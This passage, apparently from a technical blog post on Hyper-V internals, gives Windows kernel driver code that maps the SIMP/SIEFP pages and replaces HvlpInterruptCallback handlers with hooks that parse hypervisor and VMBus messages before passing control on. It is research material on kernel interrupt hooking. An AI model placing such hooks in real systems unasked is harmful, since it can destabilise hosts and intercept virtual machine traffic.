<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: #6f008a; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">DbgPrintString</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">(</span><span style="background-color: white; color: #a31515; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">"Error during pvSIMP MmMapIoSpace"</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">);</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: blue; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">return</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> 1;</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">}</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: #6f008a; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">DbgLog16</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">(</span><span style="background-color: white; color: #a31515; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">"pvSIMP[i] address"</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">, pvSIMP[i]);</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">pAdr.QuadPart = ArchReadMsr(</span><span style="background-color: white; color: #6f008a; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HV_X64_MSR_SIEFP</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">) & 0xFFFFFFFFFFFFF000;</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">pvSIEFP[i] = MmMapIoSpace(pAdr, </span><span style="background-color: white; color: #6f008a; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">PAGE_SIZE</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">, MmCached);</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: blue; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">if</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> (pvSIEFP[i] == </span><span style="background-color: white; color: #6f008a; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">NULL</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">){</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: #6f008a; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">DbgPrintString</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">(</span><span style="background-color: white; color: #a31515; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">"Error during pvSIEFP MmMapIoSpace"</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">);</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: blue; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">return</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> 1;</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">}</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: #6f008a; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">DbgLog16</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">(</span><span style="background-color: white; color: #a31515; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">"pvSIEFP address"</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">, pvSIEFP[i]);</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">}</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: blue; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">return</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> 0;</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">}</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HvlpInterruptCallback after the execution of the function RegisterInterrupt (in case the replace all handlers at the same time) is as follows:</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">kd> dps HvlpInterruptCallback</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff800`5a9ccc30 fffff800`4e9cc0a9 hyperv4!ArchmWinHvOnInterrupt </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff800`5a9ccc38 fffff800`4e9cc0e3 hyperv4!ArchXPartEnlightenedIsr </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff800`5a9ccc40 fffff800`4e9cc0e3 hyperv4!ArchXPartEnlightenedIsr </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff800`5a9ccc48 fffff800`4e9cc0e3 hyperv4!ArchXPartEnlightenedIsr </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff800`5a9ccc50 fffff800`4e9cc0e3 hyperv4!ArchXPartEnlightenedIsr</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff800`5a9ccc58 00000000`00000000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">(However, during experiments involving intensive virtual machine, it is better to replace one handler because replacing all at once leads to system instability)</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Replacement is similar to the original code: one handler for hypervisor and four handlers for processing messages from the vmbus. Procedures ArchmWinHvOnInterrupt and ArchXPartEnlightenedIsr save all registers on the stack and passed to the parse functions ParseHvMessage and ParseVmbusMessage respectively (mPUSHAD and mPOPAD macros that perform saving registers on the stack):</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ArchmWinHvOnInterrupt </span><span style="background-color: white; color: blue; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">PROC</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">mPUSHAD</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: blue; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">call</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> ParseHvMessage</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">mPOPAD</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: blue; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">mov</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: #a31515; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rdx</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">,pvWinHVOnInterruptOrig</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: blue; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">jmp</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: #a31515; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rdx</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ArchmWinHvOnInterrupt </span><span style="background-color: white; color: blue; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ENDP</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ArchXPartEnlightenedIsr </span><span style="background-color: white; color: blue; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">PROC</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">mPUSHAD</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: blue; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">call</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> ParseVmbusMessage</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">mPOPAD</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: blue; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">mov</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: #a31515; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rdx</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">,pvXPartEnlightenedIsrOrig</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: blue; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">jmp</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: #a31515; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rdx</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ArchXPartEnlightenedIsr </span><span style="background-color: white; color: blue; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ENDP</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">After parsing, the control is passed to the original procedure WinHvOnInterrupt and XPartEnlightenedIsr. Parsing function is as follows:</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: blue; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">void</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> ParseHvMessage()</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">{</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: #2b91af; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">PHV_MESSAGE</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> phvMessage, phvMessage1;</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: green; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">//</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: green; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">get the number of the active logical processors</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: #2b91af; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ULONG</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> uCurProcNum = KeGetCurrentProcessorNumberEx(</span><span style="background-color: white; color: #6f008a; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">NULL</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">);</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: blue; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">if</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> (pvSIMP[uCurProcNum] != </span><span style="background-color: white; color: #6f008a; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">NULL</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">){</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">phvMessage = (</span><span style="background-color: white; color: #2b91af; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">PHV_MESSAGE</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">)pvSIMP[uCurProcNum]; </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">} </span><span style="background-color: white; color: blue; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">else</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">{</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: #6f008a; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">DbgPrintString</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">(</span><span style="background-color: white; color: #a31515; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">"pvSIMP is NULL"</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">);</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: blue; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">return</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">;</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
